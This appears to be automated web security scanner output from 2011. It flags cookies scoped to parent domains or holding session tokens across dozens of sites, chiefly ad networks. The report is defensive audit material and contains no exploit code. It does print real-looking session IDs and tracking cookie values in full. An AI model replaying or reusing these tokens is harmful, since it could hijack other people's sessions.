HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:01:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: _smasher_session=0884043c57a485ce4cbb73416ccb308f; domain=diigo.com; path=/ ETag: "152b87fdda438c461169e0c57ed9939c" P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Runtime: 0.00139 Content-Length: 9244 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:01:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=71f18f11fd684daf83cd39428a8d9146; expires=Tue, 01-Mar-2011 19:35:09 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 06 Feb 2011 16:01:49 GMT ETag: "0493be742911f37fbd142739098641b2" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gpg.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:06:39 GMT Server: Apache Set-Cookie: SESS4f8b8e940bd1b5592aec2833218c244b=juq455no7avf4ohoeb33ho2n46; expires=Tue, 01-Mar-2011 01:39:59 GMT; path=/; domain=.gpg.org Last-Modified: Sat, 05 Feb 2011 22:06:39 GMT ETag: "92cf80f6e0d2cd5989936c5e23a89fff" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hyves.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogview/5213-Splunk-4-Users-Review.html HTTP/1.1 Host: www.infosecisland.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:05:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Set-Cookie: wiredheadSessions=1a19e483b416036c9111676e1b941b50; path=/; domain=.infosecisland.com; secure; HttpOnly Expires: Sat, 12 Feb 2011 23:05:24 GMT Cache-Control: max-age=604800 Pragma: no-cache Content-Length: 39150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tc.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/information-security/ HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/software-distribution/software-distribution HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.10 ZendServer/4.0 Set-Cookie: SESS701e63468b7538f49a91969758042315=m62ul61cvi1ckhdg53u2dh1e65; expires=Tue, 01-Mar-2011 01:40:32 GMT; path=/; domain=.oit.gatech.edu Last-Modified: Sat, 05 Feb 2011 09:15:23 GMT ETag: "b0c4a17612c3bdb20d870d94e5608032" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pdfforge.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:09:17 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Set-Cookie: SESSc75490b6e05df4b955c54eec3097373b=o8ot6jt3lo29pi8jckb7f0fjc2; expires=Tue, 01-Mar-2011 01:42:37 GMT; path=/; domain=.pdfforge.org Last-Modified: Sat, 05 Feb 2011 22:05:03 GMT ETag: "ff0ffe33d43c31cea41ae173d1fb80bd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <me ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pusha.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php/view HTTP/1.1 Host: www.sulit.com.ph Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 05 Feb 2011 22:19:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: SESSION_ID=irtoo98lni0bfkq9vmg49fn8t3; path=/; domain=.sulit.com.ph Location: http://www.sulit.com.ph/index.php/page+not+found Content-Length: 0
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webnews.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ca.gif?rb=233&ca=20472701&ct=728106282%20height=0%20width=0%20style= HTTP/1.1 Host: a.rfihub.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: m="aABseW9eg==AI20472701AAABLevCTs8="; f="aABZd22cg==AK1296740536AB1AAABLevCTs4="; a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; e=cd; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014
Response
HTTP/1.1 302 Found P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: m="aACjOGo3g==AI20472701AAABLffNWaU=AI20472701AAABLevCTs8=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: f="aAC5a_jbQ==AK1296942586AB1AAABLffNWaQ=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Cache-Control: no-cache Location: http://ib.adnxs.com/seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=333063&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arngjUNZai9A8b6vGqfDNi6rJ1IOrwG1iRfb2mun6UWAcfaZaM71VvOPKvNWAPmPZbMhDIZagUZcZcZdPiDFoZbRXgORrSVcupCRtGZcb2O5dVNPgBgKgCWi9KYAIaErmMnc2YBh9d5ihJseWviuvM0msClZcLSafio3eePFSgZcrofvZdGZcHHY27INY2qQvgOwWk7yqlLnc5J8LvggklYNxxOl7xVwF2ZdCZcHfkIZcTPAGv9LW7cuti18ri2G5nmglac3HHOZcBjfcvaUYbKOYGgRcpLWa5or6KOP9GIVZcEb69ZdZaZaKck6r7q8Zc424boVpx39LS8GTPY086n39wF7XS6BqCG43UqZcBvuiEjBBZaZbpmCZcIA404LZadCp79y6sNyLtllvmxwrJ7ZdvKyn3G0uRMswjtmF2pGQr4eTvVNTWZcAMncJfaLWO6jMPphRt0wQLgSaCbjZc4XaEZcl6WDUXVtosBTptyXFjtZcuPA
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=3013 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1txep00y10010606205; orblb=2lfk1rn0225810u010hlmv2dh10u0100000; rdrlst=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; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000o10010606205ag2leqh191f41800v1001060620582gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00y100106062055q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300k10010606205820lebnns181qq00e0l000400100b0olfjpei0g7m300k10010606205ab4lebnns1o9ct00y100106062059szlebnns1o9ct00y100106062058wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1p40600x10010606205al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00j100106052057y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300k10010606205b08lfjpei0g7m300k1001060620540slebnns181qq00e0l00040010045mlfdxmc0000000l10010606205a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; 
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1ubnn00z10020607206; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxjs0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo0000000p1002060720682gletz4d0pqa500a0l000400100ag2leqh191fia600w1002060720682hlebnns1o9ct00z100206072069zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300l10020607206820lebnns181qq00e0l000400100b0olfjpei0g7m300l10020607206ab4lebnns1o9ct00z100206072069szlebnns1o9ct00z100206072068wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1pi9400y10020607206al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei0g7m300l100206072068bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns1o9ct00k10020606206b08lfjpei0g7m300l1002060720640slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc0000000m1002060720640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Location: http://ad.yieldmanager.com/pixel?t=2&id=702840 Content-Length: 0 
Date: Sat, 05 Feb 2011 21:50:02 GMT
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3aa5/3/0/*/v;233997820;0-0;0;57848017;1-468/60;39912829/39930616/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:49 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/2179194/1-HYSA_RateV2_468x60_30k.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/savings-product.html Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0 Content-Type: text/html
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;235229193;58835998;e HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://radioshack.shoplocal.com/radioshack/default.aspx? Set-Cookie: id=c653243310000d9|2782903/965205/15010,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 22:24:01 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://personalsavings.americanexpress.com/ Set-Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sat, 05 Feb 2011 21:50:26 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259592C1875273789S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU5MkMxODc1MjczNzg5UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:05:24 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C40812S1469378459041154054T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C40812S1469378459041154054T0I14786739C0T0; expires=Sat, 07-May-2011 17:05:24 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259592C1875273789S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&zanpid=14786739C435671106T1469378459041154054 pragma: no-cache cache-control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aclk HTTP/1.1 Host: adclick.g.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
